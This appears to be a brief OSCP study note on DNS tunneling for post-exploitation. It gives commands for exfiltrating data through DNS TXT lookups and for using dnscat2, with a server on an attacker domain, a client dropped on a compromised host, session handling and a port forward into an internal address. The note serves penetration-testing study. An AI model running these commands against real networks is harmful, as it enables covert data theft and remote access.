// notes/ Pivoting & Tunneling
🚀

DNS Tunneling

Data can be exfiltrated using DNS records and the protocol itself

#post exploitation#adot8
source · oscp.adot8.com · post-exploitation/dns-tunneling

DNS Tunneling

Data can be exfiltrated using DNS records and the protocol itself

Create a txt record on compromised server and exfil line by line

code
01nslookup -type=txt exfiltrated.data.dogs.corp

dnscat2

Spin up dnscat2 server

code
01dnscat2-server feline.corp

Drop binary on compromised host and create tunnel

code
01./dnscat feline.corp
<figure><img src="/files/tK9k1IwMFYrr2GQp95BZ" alt=""><figcaption></figcaption></figure>

View sessions

code
01windows

Interact with a session

code
01window -i 1

Set up a port forward

code
01listen 0.0.0.0:1338 172.16.192.217:4646